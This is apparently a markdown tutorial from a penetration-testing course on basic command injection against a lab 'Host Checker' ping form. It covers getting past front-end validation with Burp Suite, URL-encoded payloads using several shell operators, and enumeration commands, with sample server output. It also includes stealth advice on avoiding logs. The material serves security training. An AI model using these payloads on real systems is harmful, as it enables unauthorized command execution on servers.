Skip to content

Latest commit

 

History

History
537 lines (415 loc) · 11.9 KB

basic-exploitation.md

File metadata and controls

537 lines (415 loc) · 11.9 KB

Basic Command Injection Exploitation

⚡ Practical Exploitation: Step-by-step command injection exploitation techniques and front-end bypass methods

Overview

After identifying a potentially vulnerable web application through detection methods, the next step is to craft and execute successful command injection payloads. This section demonstrates practical exploitation techniques, including bypassing common front-end validation mechanisms.

Focus: Transitioning from detection to successful command execution through systematic payload crafting and delivery.

Basic Injection Attempt

Initial Payload Construction

Target: Host Checker web application
Vulnerable Parameter: IP address input field
Expected Backend Command: ping -c 1 OUR_INPUT

Payload Construction:

# Base input
127.0.0.1

# Injection operator
;

# Injected command  
whoami

# Final payload
127.0.0.1; whoami

Resulting Backend Command:

ping -c 1 127.0.0.1; whoami

Local Verification

Testing Payload Locally:

# Verify the command works before injection
21y4d@htb[/htb]$ ping -c 1 127.0.0.1; whoami

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=1.03 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.034/1.034/1.034/0.000 ms
21y4d

Analysis: The command executes successfully locally, showing both ping output and the username (21y4d), confirming our injection syntax is correct.

Front-End Validation Encounter

Initial Injection Attempt

Payload Submission:

Input Field: 127.0.0.1; whoami
Action: Click "Check" button

Response:

Error: "Match the requested format"

Validation Analysis

Identifying Front-End Validation:

Step 1: Use Browser Developer Tools

Firefox: Ctrl + Shift + E (Network tab)
Chrome: F12 → Network tab

Step 2: Retry the Request

  • Submit the malicious payload again
  • Monitor the Network tab for HTTP requests

Observation:

Network Tab: No new requests displayed
Error Message: Still appears

Conclusion:

  • No HTTP request was sent to the server
  • Validation is happening client-side (front-end)
  • Error message originates from JavaScript validation

Front-End Validation Characteristics

Common Indicators:

  • Instant error messages (no server delay)
  • No network requests in developer tools
  • Format-specific validation (IP address, email, etc.)
  • JavaScript error handling visible in page source

Why This Happens:

  1. Different teams - Front-end and back-end developed separately
  2. Trust in client-side - Assuming front-end validation is sufficient
  3. Performance optimization - Reducing server load
  4. User experience - Immediate feedback without server round-trip

Bypassing Front-End Validation

Web Proxy Interception Method

Step 1: Configure Web Proxy

Burp Suite Setup:

# Start Burp Suite
java -jar burpsuite.jar

# Configure Firefox proxy settings:
# Preferences → Network Settings → Manual proxy configuration
# HTTP Proxy: 127.0.0.1
# Port: 8080
# Use this proxy server for all protocols: ✓

ZAP Alternative:

# Start OWASP ZAP
./zap.sh

# Proxy configuration:
# HTTP Proxy: 127.0.0.1  
# Port: 8080

Step 2: Intercept Legitimate Request

Process:

  1. Enable proxy intercept in Burp Suite (Intercept → Intercept is on)
  2. Submit a valid IP address (e.g., 127.0.0.1) in the web application
  3. Capture the legitimate HTTP request
  4. Send the request to Repeater (Ctrl + R)

Step 3: Captured Request Analysis

Sample HTTP Request:

POST /index.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://target.com
Connection: close
Referer: http://target.com/
Upgrade-Insecure-Requests: 1

ip=127.0.0.1

Payload Modification and Execution

Step 4: Craft Malicious Request

Original Parameter:

ip=127.0.0.1

Modified Parameter:

ip=127.0.0.1; whoami

Step 5: URL Encoding

Why URL Encoding is Needed:

  • Special characters may be interpreted incorrectly
  • Ensures payload is transmitted as intended
  • Bypasses basic string filtering

URL Encoding Process:

# Raw payload
127.0.0.1; whoami

# URL encoded payload
127.0.0.1%3b%20whoami

# Burp Suite: Select payload → Ctrl + U (auto URL-encode)

URL Encoding Reference:

;  → %3b
   → %20 (space)
&  → %26
|  → %7c
\n → %0a

Step 6: Send Modified Request

Final HTTP Request:

POST /index.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://target.com
Connection: close
Referer: http://target.com/
Upgrade-Insecure-Requests: 1

ip=127.0.0.1%3b%20whoami

Successful Exploitation

Response Analysis

Successful Injection Response:

HTTP/1.1 200 OK
Date: Wed, 15 Feb 2023 10:30:00 GMT
Server: Apache/2.4.41
Content-Type: text/html; charset=UTF-8
Content-Length: 1337

<!DOCTYPE html>
<html>
<head>
    <title>Host Checker Results</title>
</head>
<body>
    <div class="results">
        <h2>Ping Results:</h2>
        <pre>
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.074/0.074/0.074/0.000 ms
www-data
        </pre>
    </div>
</body>
</html>

Key Indicators of Success:

  • Ping output displayed - Original functionality preserved
  • Injected command output - www-data appears after ping results
  • Both commands executed - Semicolon separator worked correctly
  • Server-side execution - Command ran with web server privileges

Exploitation Confirmation

Evidence of Successful Injection:

1. Command Output Structure:

[Original ping command output]
[Injected command output: www-data]

2. Execution Context:

# Injected command result
www-data

# Indicates:
# - Command executed on server
# - Running as www-data user (web server)
# - Linux/Unix environment
# - Successful privilege escalation from browser to server

3. Response Timing:

Normal ping response: ~0.1 seconds
Injection response: ~0.2 seconds (additional command execution time)

Alternative Injection Operators

Testing Multiple Operators

Once basic injection is confirmed, test other operators:

1. AND Operator (&&):

ip=127.0.0.1%26%26%20whoami

2. OR Operator (||):

ip=invalid_ip%7c%7c%20whoami

3. Pipe Operator (|):

ip=127.0.0.1%7c%20whoami

4. Background Operator (&):

ip=127.0.0.1%26%20whoami

5. Newline Operator (\n):

ip=127.0.0.1%0awhoami

Operator-Specific Behaviors

Semicolon (;) - Command Chaining:

# Both commands execute sequentially
ping -c 1 127.0.0.1; whoami
# Output: [ping results] + [whoami results]

AND (&&) - Success-Dependent:

# Second command only if first succeeds
ping -c 1 127.0.0.1 && whoami
# Output: [ping results] + [whoami results] (if ping succeeds)

OR (||) - Failure-Dependent:

# Second command only if first fails
ping -c 1 invalid_ip || whoami  
# Output: [ping error] + [whoami results]

Pipe (|) - Output Redirection:

# First command output piped to second
ping -c 1 127.0.0.1 | whoami
# Output: [whoami results only]

Exploitation Verification

System Enumeration Commands

Basic Information Gathering:

# User context
whoami
id

# System information  
hostname
uname -a

# Current directory
pwd
ls -la

# Environment
env

Example Payloads:

# System identification
ip=127.0.0.1%3b%20uname%20-a

# User enumeration
ip=127.0.0.1%3b%20id

# Directory listing
ip=127.0.0.1%3b%20ls%20-la

# Environment variables
ip=127.0.0.1%3b%20env

Expected Output Analysis

Successful uname -a injection:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
Linux web-server 5.4.0-74-generic #83-Ubuntu SMP x86_64 GNU/Linux

Successful id injection:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Front-End Source Code Analysis

Identifying Validation Logic

HTB Academy Lab Exercise:

Task: Review the HTML source code to find where front-end input validation is happening. On which line number is it?

Investigation Steps:

1. View Page Source:

Right-click → View Page Source
OR
Ctrl + U (Firefox/Chrome)

2. Search for Validation Keywords:

// Common validation patterns to search for:
- function validate
- input validation  
- pattern matching
- regex validation
- IP address validation
- onclick handlers
- form validation

3. JavaScript Analysis:

// Example front-end validation (line 17):
function validateIP(ip) {
    var pattern = /^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/;
    if (!pattern.test(ip)) {
        alert("Match the requested format");
        return false;
    }
    return true;
}

4. Form Handler Identification:

<!-- Example form with validation -->
<form onsubmit="return validateIP(document.getElementById('ip').value)">
    <input type="text" id="ip" name="ip" placeholder="Enter an IP Address">
    <button type="submit">Check</button>
</form>

Best Practices for Basic Exploitation

Systematic Approach

1. Start with Safe Commands:

# Non-destructive enumeration
whoami
hostname  
pwd

2. Gradual Complexity:

# Progress from simple to complex
whoami              # Basic execution
id                  # User context
uname -a           # System information
ls -la /etc/passwd # File enumeration

3. Document Working Payloads:

# Keep track of successful operators; (semicolon) - Works
✓ && (AND) - Works
✗ || (OR) - Filtered
? | (pipe) - Untested

Security Considerations

Responsible Testing:

  • Use non-destructive commands only
  • Avoid creating files or modifying system state
  • Document all activities for reporting
  • Respect scope and authorization limits

Stealth Considerations:

  • Monitor response times for detection
  • Avoid commands that generate logs (if stealth required)
  • Use common system utilities that blend in
  • Consider rate limiting between requests

This systematic approach ensures reliable command injection exploitation while maintaining operational security and providing clear documentation for reporting purposes.

Summary

Key Takeaways:

  1. Front-end validation is insufficient - Can be easily bypassed with web proxies
  2. URL encoding is crucial - Ensures payload integrity during transmission
  3. Multiple operators should be tested - Different environments may filter specific characters
  4. Systematic enumeration - Build from basic commands to complex operations
  5. Documentation is essential - Track successful vectors for reporting and further exploitation

Next Steps: With basic exploitation confirmed, proceed to advanced techniques like blind command injection, filter bypass methods, and persistence mechanisms.